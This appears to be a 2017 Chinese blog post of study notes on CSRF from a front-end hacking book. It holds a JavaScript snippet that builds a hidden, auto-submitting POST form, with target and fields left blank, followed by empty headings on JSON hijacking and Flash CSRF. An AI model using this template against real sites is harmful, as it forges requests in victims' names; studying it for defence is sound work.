web前端黑客技术揭秘 4.前端黑客之CSRF

 

 

 1     function new_form() {//创建表单
 2             var f = document.createElement("form");
 3             document.body.appendChild(f);
 4             f.method = "post";
 5             return f;
 6         }
 7         function create_elements(eForm, eName, eValue) {
 8             //创建表单项函数,eForm:表单对象,eName:表单项,eValue:表单值
 9             var e = document.createElement("input");
10             eForm.appendChild(e);
11             e.type = "text";
12             e.name = eName;
13             if (!document.all) {
14                 e.style.display = "none";
15             } else {
16                 e.style.display = "block";
17                 e.style.width = "0px"
18                 e.style.height = "0px"
19             }//兼容浏览器的隐藏设置,目的是让表单不可见
20             e.value = eValue;
21             return e;
22         }
23         var _f = new_form();
24         create_elements(_f, "", "");
25         _f.action = "";
26         _f.submit();//自动提交

 

4.2  CSRF类型

 

4.2.2  JSON HiJacking攻击

 

4.2.3  Flash CSRF攻击

posted @ 2017-08-18 17:17  wingzw  阅读(201)  评论(0编辑  收藏  举报